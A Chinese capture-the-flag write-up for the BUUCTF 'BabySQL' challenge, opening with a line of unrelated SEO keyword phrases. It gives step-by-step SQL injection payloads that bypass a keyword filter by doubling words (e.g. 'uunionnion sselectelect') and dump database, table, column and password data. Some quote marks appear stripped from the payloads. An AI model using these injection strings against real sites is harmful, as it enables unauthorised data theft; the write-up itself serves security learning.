如何将网站生成二维码,wordpress 多字段,哪些行业适合做网络推广,建湖人才网手机版题目来源#xff1a;buuctf [极客大挑战 2019]BabySQL 1
目录
一、打开靶机#xff0c;分析已知信息
二、手工注入解题
step 1#xff1a;万能密码
step 2#xff1a;正常注入#xff0c;判断字段数
step 3#xff1a;绕过
step 4#xff1a;查数据库
step 5buuctf [极客大挑战 2019]BabySQL 1
目录
一、打开靶机分析已知信息
二、手工注入解题
step 1万能密码
step 2正常注入判断字段数
step 3绕过
step 4查数据库
step 5查表名
step 6查列名
step 7查数据
三、小结
1.绕过方式
2.查数据库名和表名可以合二为一 一、打开靶机分析已知信息 仍为SQL注入系列提示有关键字过滤
二、手工注入解题
step 1万能密码
usernameadminpasswordadmin or 11 usernameadminpasswordadmin or 11 发现万能密码失效了两种密码结果不同是因为的单引号位置不同导致闭合情况不同
step 2正常注入判断字段数
username1 order by 3%23password1 发现or和by都被过滤了
再用
usernameadminpassword1 union select 1,where
发现union select where 都被过滤了 过滤有可能用函数将这些关键字替换成了空白字符 所以要进行绕过
step 3绕过 尝试过后发现大小写绕过失效所以尝试双写绕过没问题则利用双写关键字进行注入 但这里order by还是无法使用所以用联合查询直接进行尝试
1.尝试两个字段
usernameadminpassword1 uunionnion sselectelect 1,2%23 出现错误有可能列数错误继续尝试
2.尝试三个字段
usernameadminpassword1 uunionnion sselectelect 1,2,3%23
回显正常了且回显点为23位置 step 4查数据库
usernameadminpassword1 uunionnion sselectelect 1,2,database()%23 数据库名为geek
step 5查表名
usernameadminpassword1 uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schemageek%23 得到表名b4bsql
step 6查列名
usernameadminpassword1 uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_nameb4bsql%23 其中password很可疑
step 7查数据
usernameadminpassword1 uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom geek.b4bsql%23 从源码中得具体信息flag{14a8c091-b278-4155-a56e-c663801feb59}
三、小结
1.绕过方式
如大小写绕过双写绕过双关键字绕过如Uunionnion第一个字母后跟原关键字
SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客
2.查数据库名和表名可以合二为一
如usernameadminpassword1 uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schemadatabase()%23